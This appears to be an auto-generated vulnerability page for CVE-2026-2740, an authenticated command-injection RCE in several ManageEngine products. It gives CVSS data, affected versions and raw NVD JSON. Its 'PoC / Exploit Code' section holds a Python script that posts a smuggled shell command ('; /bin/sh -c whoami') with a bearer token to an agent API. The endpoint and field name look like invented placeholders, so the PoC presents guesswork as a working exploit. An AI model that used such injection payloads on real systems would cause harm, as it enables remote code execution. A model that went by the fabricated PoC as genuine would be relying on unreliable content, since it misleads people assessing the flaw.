Security Vulnerability Report
CVE-2026-2740 CVSS 8.4 HIGH

CVE-2026-2740

Published: 2026-05-21 14:16:45
Last Modified: 2026-05-21 15:26:36
Source: 0fc0942c-577d-436f-ae8e-945763c79b02

Description

Zohocorp ManageEngine ADSelfService Plus versions before 6525, DataSecurity Plus before 6264 and RecoveryManager Plus before 6313 are vulnerable to authenticated remote code execution on the agent machines due to a bug in a third-party dependency.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Zohocorp ManageEngine ADSelfService Plus < 6525
Zohocorp ManageEngine DataSecurity Plus < 6264
Zohocorp ManageEngine RecoveryManager Plus < 6313

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable agent endpoint
target_url = "http://target-server:8080/agent/api"

# Valid authentication credentials or session token
auth_header = {
    "Authorization": "Bearer <valid_low_priv_token>"
}

# Malicious payload exploiting the 3rd party dependency bug
# This attempts to execute a shell command (e.g., whoami)
exploit_payload = {
    "config": {
        "dependency_field": "; /bin/sh -c 'whoami'"
    }
}

try:
    response = requests.post(target_url, json=exploit_payload, headers=auth_header, verify=False)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check if the command was executed on the agent machine.")
        print("Response:", response.text)
    else:
        print("[-] Failed to send request.")
        print("Status Code:", response.status_code)
except Exception as e:
    print(f"[!] An error occurred: {e}")
```

References

https://www.manageengine.com/products/self-service-password/advisory/CVE-2026-2740.html

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-2740",
    "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02",
    "published": "2026-05-21T14:16:44.850",
    "lastModified": "2026-05-21T15:26:35.653",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Zohocorp ManageEngine ADSelfService Plus version before 6525, DataSecurity Plus before 6264 and RecoveryManager Plus before 6313 are vulnerable to Authenticated Remote code execution in the agent machines due to the bug in the 3rd party dependency."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "0fc0942c-577d-436f-ae8e-945763c79b02",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
            "baseScore": 8.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "0fc0942c-577d-436f-ae8e-945763c79b02",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-77"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.manageengine.com/products/self-service-password/advisory/CVE-2026-2740.html",
        "source": "0fc0942c-577d-436f-ae8e-945763c79b02"
      }
    ]
  }
}
```